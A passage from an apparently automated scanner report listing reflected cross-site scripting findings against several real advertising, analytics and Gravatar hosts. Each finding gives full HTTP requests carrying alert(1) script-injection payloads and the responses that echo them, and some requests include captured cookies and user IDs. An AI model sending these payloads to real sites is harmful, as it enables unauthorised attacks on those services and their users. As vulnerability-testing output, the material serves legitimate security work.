6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:14:59 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvunbaefe<script>alert(1)</script>f74b73704e0)

3.9. http://ar.voicefive.com/b/node_rcAll.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 98602<script>alert(1)</script>d7cd6ea1cb was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run98602<script>alert(1)</script>d7cd6ea1cb&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:44 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:44 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1556

COMSCORE.BMX.Buddy.run98602<script>alert(1)</script>d7cd6ea1cb({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32
...[SNIP]...

3.10. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 33f79<script>alert(1)</script>0582dfaaac5 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=233f79<script>alert(1)</script>0582dfaaac5&c2=6036034&c3=&c4=/ontv/&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:48 GMT
Date: Mon, 13 Jun 2011 17:45:48 GMT
Content-Length: 1245
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"233f79<script>alert(1)</script>0582dfaaac5", c2:"6036034", c3:"", c4:"/ontv/", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});



3.11. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload ed9b7<script>alert(1)</script>76715acdffe was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/ontv/&c5=20000&c6=&c15=ed9b7<script>alert(1)</script>76715acdffe HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:54 GMT
Date: Mon, 13 Jun 2011 17:45:54 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/ontv/", c5:"20000", c6:"", c10:"", c15:"ed9b7<script>alert(1)</script>76715acdffe", c16:"", r:""});



3.12. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 9d049<script>alert(1)</script>23421510a6e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=60360349d049<script>alert(1)</script>23421510a6e&c3=&c4=/ontv/&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:49 GMT
Date: Mon, 13 Jun 2011 17:45:49 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"60360349d049<script>alert(1)</script>23421510a6e", c3:"", c4:"/ontv/", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});



3.13. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 99270<script>alert(1)</script>dde17540461 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=99270<script>alert(1)</script>dde17540461&c4=/ontv/&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:50 GMT
Date: Mon, 13 Jun 2011 17:45:50 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"99270<script>alert(1)</script>dde17540461", c4:"/ontv/", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});



3.14. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload dbdf5<script>alert(1)</script>0949ac68ed9 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/ontv/dbdf5<script>alert(1)</script>0949ac68ed9&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:51 GMT
Date: Mon, 13 Jun 2011 17:45:51 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/ontv/dbdf5<script>alert(1)</script>0949ac68ed9", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});



3.15. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 200b9<script>alert(1)</script>b8a7f3d243d was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/ontv/&c5=20000200b9<script>alert(1)</script>b8a7f3d243d&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:51 GMT
Date: Mon, 13 Jun 2011 17:45:51 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
score;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/ontv/", c5:"20000200b9<script>alert(1)</script>b8a7f3d243d", c6:"", c10:"", c15:"", c16:"", r:""});



3.16. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 45df9<script>alert(1)</script>408425a65e6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/ontv/&c5=20000&c6=45df9<script>alert(1)</script>408425a65e6&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:53 GMT
Date: Mon, 13 Jun 2011 17:45:53 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/ontv/", c5:"20000", c6:"45df9<script>alert(1)</script>408425a65e6", c10:"", c15:"", c16:"", r:""});



3.17. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Comments/-/threaded [includeWBR&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Comments/-/threaded

Issue detail

The value of the includeWBR&callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 48db4%3balert(1)//62468e88888 was submitted in the includeWBR&callback parameter. This input was echoed as 48db4;alert(1)//62468e88888 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Comments/-/threaded?q=mgid%3Acms%3Aitem%3Amtv.com%3A10325912&start-index=1&max-results=20&commentId=-1&includeWBR&callback=FD0607159300748db4%3balert(1)//62468e88888 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w09g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 32486
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:27:54 GMT
Connection: close

if (typeof(FD0607159300748db4;alert(1)//62468e88888) == 'function'){FD0607159300748db4;alert(1)//62468e88888({"EndIndex":20,"IsFirstPage":true,"IsLastPage":false,"Items":[{"ChildComments":null,"Creator":{"InitialConnection":1,"LoginName":null,"ProfileU
...[SNIP]...

3.18. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 961e7%3balert(1)//89daa690b16 was submitted in the callback parameter. This input was echoed as 961e7;alert(1)//89daa690b16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/?q=mgid%3Auma%3Avideolist%3Amtv.com%3A1665248&callback=F759D20533007961e7%3balert(1)//89daa690b16 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w04g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 4161
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:19:19 GMT
Connection: close

if (typeof(F759D20533007961e7;alert(1)//89daa690b16) == 'function'){F759D20533007961e7;alert(1)//89daa690b16({"Title":"Teen Wolf | Ep. 2 | Second Chance At First Line","Ucid":"D3FCFFFF0002D51D001B01467146","Thumbnails":{"__type":"VideoThumbnailsData","
...[SNIP]...

3.19. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5c20c%3balert(1)//bdd2a2a47da was submitted in the callback parameter. This input was echoed as 5c20c;alert(1)//bdd2a2a47da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage?q=mgid%3Acms%3Aitem%3Amtv.com%3A10325912&callback=F9A3A187B30075c20c%3balert(1)//bdd2a2a47da HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w08g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 583
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:20:25 GMT
Connection: close

if (typeof(F9A3A187B30075c20c;alert(1)//bdd2a2a47da) == 'function'){F9A3A187B30075c20c;alert(1)//bdd2a2a47da({"CommentCount":34,"CommentData":null,"GainRatingCount":0,"IsFirstPage":false,"IsInvisible":false,"IsLastPage":false,"OverallFiveStarRating":0,
...[SNIP]...

3.20. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cdf46%3balert(1)//305c1f01dcb was submitted in the callback parameter. This input was echoed as cdf46;alert(1)//305c1f01dcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services?earlyServicesOnly=true&callback=F6C1C761B3007cdf46%3balert(1)//305c1f01dcb HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w10g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 3629
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:20:23 GMT
Connection: close

if (typeof(F6C1C761B3007cdf46;alert(1)//305c1f01dcb) == 'function'){F6C1C761B3007cdf46;alert(1)//305c1f01dcb([{"__type":"ExternalShareServiceData","LargeThumbnailUrl":"http:\/\/static0.fluxstatic.com\/-\/Clients\/Common\/Img\/ExternalCommunityThumbnail
...[SNIP]...

3.21. http://en.gravatar.com/site/implement [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.gravatar.com
Path:   /site/implement

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fe1"><a>158c986cf81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /site14fe1"><a>158c986cf81/implement HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.1.10.1308011412; __qca=P0-894869797-1308011414185

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 8537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<a href="http://en.gravatar.com/site14fe1"><a>158c986cf81/implement.json">
...[SNIP]...

3.22. http://en.gravatar.com/site/login/%252F [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.gravatar.com
Path:   /site/login/%252F

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f83a0"><a>822417fb1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitef83a0"><a>822417fb1b/login/%252F HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
